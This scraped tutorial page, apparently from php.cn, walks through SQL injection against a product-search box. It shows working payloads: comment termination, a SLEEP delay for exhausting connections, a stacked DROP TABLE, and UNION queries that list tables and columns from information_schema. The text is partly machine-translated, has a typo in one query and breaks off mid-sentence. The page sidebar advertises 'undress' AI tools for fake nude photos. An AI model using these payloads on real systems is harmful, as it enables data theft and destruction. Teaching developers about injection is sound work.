Quickly understand the basic principles of sql injection

##Basic Principles of SQL Injection

WEB technology is developing rapidly, but the traditional craft of spelling SQL with bare hands is still favored by quite a few developers. After all, compared to learning a complex set of ORM rules, doing it by hand is more convenient and intuitive. Usually people who write SQL by themselves should have heard that

SQL injection is dangerous, but they always think to themselves: My SQL statement is so simple that it cannot be injected.

Take 5 minutes to read this complete example. From now on, you should never dare to take any chances.

Simple scenario

There is a WEB interface that provides input of product names and displays corresponding price, production date and production location information. For example, enter Hammer display:

ProductPricePlace of productionDate of productionClaw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11##We skipped the process of building a web search interface, Focus directly on the key parts: SQL injection

. If we want to realize the above function, then we can roughly guess that the SQL statement used by the server is as follows:

SELECT ? FROM ? WHERE ? LIKE '%Hammer%';

where? means that we currently do not know the specific table name and field name, and this SQL is unique What can be manipulated is the input content inside single quotes '%Hammer%'. If we directly enter a single quote in the search box. That is, it becomes

select ? from ? where ? Like '%'%';

. After splicing like this, it will cause a SQL syntax error and no results will be obtained. We need to use

--

to comment out the last single quote. <div class="code" style="position:relative; padding:0px; margin:0px;"><pre class='brush:php;toolbar:false;'>select ? from ? where ? Like &amp;#39;%&amp;#39;; -- %&amp;#39;;</pre><div class="contentsignin">Copy after login</div></div>

--

is followed by the comment content (you can also use #), so that you can get all the product information. So far, I still haven’t smelled it. Danger signal.

##ProductPricePlace of productionDate of productionClaw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11Paring Knife10.98China2019.11.11Boning Knife19.98China2019.01.01Try it off and

Hold on to the expandable single quote part in the previous step. Let’s try a simple delay statement:

select ? from ? where ? Like '%Hammer%' and 1 = SLEEP(2); -- %';

At this time, the query will take 2 seconds to return the result. If the time is extended, use the script to query several times, and the database connection pool can be restored in one go. run out.

Of course, there are even more destructive ones!

select ? from ? where ? Like '%Hammer%'; drop table xxxx; -- %';

You can directly delete the table/database. As for how to know which tables are in the database (that is, how to determine xxxx in the previous SQL sentence)?

Do whatever you want union

We need to know what tables this database has! Only in this way can you get useful information.

You can use union to put the contents of different tables together. Give it a try:

select ?,?,?,? from ? where ? Like '%Hammer%' UNION (select 1,2,3,4 from dual); -- %';

##ProductPriceClaw Hammer12.9829.982

Place of production

Date of production

American

2019.11.07

Club Hammer

Canada

2019.11.11

1

3

4

可以看到我们把假数据1，2，3，4成功地拼接到搜索结果中。

Mysql系统自带的信息都存在information_schema数据库中。我们试着在里面找找有用的信息。

select ? from ? where ? Like '%Hammer%' UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); -- %';

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
authors	hawkeye	3	4
products	hawkeye	3	4
user	hawkeye	3	4
....	....	3	4

现在知道了这些数据库名和表名，所有人都对它为所欲为了！(包括上面执行的DROP)。

看着列表一猜就能知道我们目前查的是products表，接下来我们再把products具体的字段也挖出来。

select ? from ? where ? Like '%Hammer%' UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name = 'products'); -- %';

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
id	hawkeye	3	4
name	hawkeye	3	4
price	hawkeye	3	4
address	hawkeye	3	4
updated_at	hawkeye	3	4

所以，通过上面2步，我们知道了表名和字段名，那么查询API的完整SQL应该是(把上面的?都补全啦)：

select name,price,address,updated_at from products where name like '%Hammer%';

通过不断重复以上几个步骤，你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的user表

The above is the detailed content of Quickly understand the basic principles of sql injection. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Show More

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution

3 weeks ago By DDD

What's New in Windows 11 KB5054979 & How to Fix Update Issues

2 weeks ago By DDD

Where to find the Crane Control Keycard in Atomfall

3 weeks ago By DDD

Assassin's Creed Shadows - How To Find The Blacksmith And Unlock Weapon And Armour Customisation

4 weeks ago By DDD

Roblox: Dead Rails - How To Complete Every Challenge

3 weeks ago By DDD

Show More

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Show More

Hot Topics

Where is the login entrance for gmail email?

7579

15

CakePHP Tutorial

1386

52

What is the format of the account name of steam

87

11

win11 activation key permanent

63

19

nyt connections hints and answers

28

111

Show More

Related knowledge

Analysis of the function and principle of nohup Mar 25, 2024 pm 03:24 PM

Analysis of the role and principle of nohup In Unix and Unix-like operating systems, nohup is a commonly used command that is used to run commands in the background. Even if the user exits the current session or closes the terminal window, the command can still continue to be executed. In this article, we will analyze the function and principle of the nohup command in detail. 1. The role of nohup: Running commands in the background: Through the nohup command, we can let long-running commands continue to execute in the background without being affected by the user exiting the terminal session. This needs to be run

In-depth discussion of the principles and practices of the Struts framework Feb 18, 2024 pm 06:10 PM

Principle analysis and practical exploration of the Struts framework. As a commonly used MVC framework in JavaWeb development, the Struts framework has good design patterns and scalability and is widely used in enterprise-level application development. This article will analyze the principles of the Struts framework and explore it with actual code examples to help readers better understand and apply the framework. 1. Analysis of the principles of the Struts framework 1. MVC architecture The Struts framework is based on MVC (Model-View-Con

In-depth understanding of the batch Insert implementation principle in MyBatis Feb 21, 2024 pm 04:42 PM

MyBatis is a popular Java persistence layer framework that is widely used in various Java projects. Among them, batch insertion is a common operation that can effectively improve the performance of database operations. This article will deeply explore the implementation principle of batch Insert in MyBatis, and analyze it in detail with specific code examples. Batch Insert in MyBatis In MyBatis, batch Insert operations are usually implemented using dynamic SQL. By constructing a line S containing multiple inserted values

An in-depth discussion of the functions and principles of Linux RPM tools Feb 23, 2024 pm 03:00 PM

The RPM (RedHatPackageManager) tool in Linux systems is a powerful tool for installing, upgrading, uninstalling and managing system software packages. It is a commonly used software package management tool in RedHatLinux systems and is also used by many other Linux distributions. The role of the RPM tool is very important. It allows system administrators and users to easily manage software packages on the system. Through RPM, users can easily install new software packages and upgrade existing software

Laravel Development Notes: Methods and Techniques to Prevent SQL Injection Nov 22, 2023 pm 04:56 PM

Laravel Development Notes: Methods and Techniques to Prevent SQL Injection With the development of the Internet and the continuous advancement of computer technology, the development of web applications has become more and more common. During the development process, security has always been an important issue that developers cannot ignore. Among them, preventing SQL injection attacks is one of the security issues that requires special attention during the development process. This article will introduce several methods and techniques commonly used in Laravel development to help developers effectively prevent SQL injection. Using parameter binding Parameter binding is Lar

Detailed explanation of the principle of MyBatis paging plug-in Feb 22, 2024 pm 03:42 PM

MyBatis is an excellent persistence layer framework. It supports database operations based on XML and annotations. It is simple and easy to use. It also provides a rich plug-in mechanism. Among them, the paging plug-in is one of the more frequently used plug-ins. This article will delve into the principles of the MyBatis paging plug-in and illustrate it with specific code examples. 1. Paging plug-in principle MyBatis itself does not provide native paging function, but you can use plug-ins to implement paging queries. The principle of paging plug-in is mainly to intercept MyBatis

An in-depth analysis of the functions and working principles of the Linux chage command Feb 24, 2024 pm 03:48 PM

The chage command in the Linux system is a command used to modify the password expiration date of a user account. It can also be used to modify the longest and shortest usable date of the account. This command plays a very important role in managing user account security. It can effectively control the usage period of user passwords and enhance system security. How to use the chage command: The basic syntax of the chage command is: chage [option] user name. For example, to modify the password expiration date of user "testuser", you can use the following command

The basic principles and methods of implementing inheritance methods in Golang Jan 20, 2024 am 09:11 AM

The basic principles and implementation methods of Golang inheritance methods In Golang, inheritance is one of the important features of object-oriented programming. Through inheritance, we can use the properties and methods of the parent class to achieve code reuse and extensibility. This article will introduce the basic principles and implementation methods of Golang inheritance methods, and provide specific code examples. The basic principle of inheritance methods In Golang, inheritance is implemented by embedding structures. When a structure is embedded in another structure, the embedded structure has embedded

See all articles

Public welfare online PHP training，Help PHP learners grow quickly！

About us Disclaimer Sitemap

© php.cn All rights reserved